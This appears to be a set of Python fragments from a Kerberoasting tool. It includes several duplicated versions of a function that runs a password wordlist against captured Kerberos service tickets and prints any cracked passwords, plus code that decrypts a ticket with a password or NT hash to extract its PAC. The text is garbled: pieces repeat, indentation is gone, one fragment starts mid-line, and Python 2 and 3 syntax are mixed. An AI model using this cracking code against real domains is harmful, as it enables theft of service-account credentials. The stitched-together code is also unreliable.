def crack(wordlist, enctickets):
toremove = []
while enctickets:
try:
word = wordlist.get()
if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
break
print "\ntrying %s" % word.encode('utf-8').decode(
'utf-8-sig').strip()
for et in enctickets:
kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2,
et[0])
if kdata:
print 'found password for ticket %i: %s File: %s' % (
et[1], word, et[2])
toremove.append(et)
# if len(et):
# print str(et[0])
for et in toremove:
try:
enctickets.remove(et)
except:
return
if not enctickets:
return
except:
continue
def crack(wordlist, enctickets):
toremove = []
while enctickets:
word = wordlist.get()
#print "trying %s" % word
for et in enctickets:
kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
if kdata:
print('found password for ticket %i: %s File: %s' %
(et[1], word, et[2]))
toremove.append(et)
for et in toremove:
try:
enctickets.remove(et)
except:
return
if not enctickets:
return
def crack(wordlist, enctickets): toremove = [] while enctickets: word = wordlist.get() if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE': break #print "trying %s" % word for et in enctickets: kdata, nonce = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0]) if kdata: print 'found password for ticket %i: %s File: %s' % (et[1], word, et[2]) toremove.append(et) for et in toremove: try: enctickets.remove(et) except: return if not enctickets: return
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False,
default=False,
help='verbose')
parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False,
default=False,
help='show debug messages')
#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2,
# metavar='2', type=int,
# help='message type, from RAM it is 2 (This should not need to be changed)')
args = parser.parse_args()
# make sure a password or hash is provided
if args.nthash == None and args.password != None:
key = kerberos.ntlmhash(args.password)
elif args.nthash != None:
key = args.nthash.decode('hex')
else:
print("You must provide either the password (-p) or the hash (-n)")
exit(1)
# read the ticket from the file
fullraw = args.infile.read()
args.infile.close()
# do the rewrite
#newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose)
pac = getpac(key, fullraw)
pacobj = PAC.PAC(pac)
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False,
default=False,
help='verbose')
parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False,
default=False,
help='show debug messages')
#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2,
# metavar='2', type=int,
# help='message type, from RAM it is 2 (This should not need to be changed)')
args = parser.parse_args()
# make sure a password or hash is provided
if args.nthash == None and args.password != None:
key = kerberos.ntlmhash(args.password)
elif args.nthash != None:
key = args.nthash.decode('hex')
else:
print "You must provide either the password (-p) or the hash (-n)"
exit(1)
# read the ticket from the file
fullraw = args.infile.read()
args.infile.close()
# do the rewrite
#newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose)
pac = getpac(key, fullraw)
pacobj = PAC.PAC(pac)
((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f))
i += 1
elif data[:2] == '6d':
for ticket in data.strip().split('\n'):
enctickets.append(((decoder.decode(
ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f))
i += 1
if len(enctickets):
print("Cracking %i tickets..." % len(enctickets))
else:
print("No tickets found")
sys.exit()
# load wordlist
for w in args.wordlistfile:
word = w.decode('utf-8').strip()
hash = kerberos.ntlmhash(word)
for et in enctickets:
kdata, nonce = kerberos.decrypt(hash, 2, et[0])
if kdata:
print('found password for ticket %i: %s File: %s' %
(et[1], word, et[2]))
enctickets.remove(et)
if len(enctickets) == 0:
print('Successfully cracked all tickets')
sys.exit()
if len(enctickets):
print("Unable to crack %i tickets" % len(enctickets))
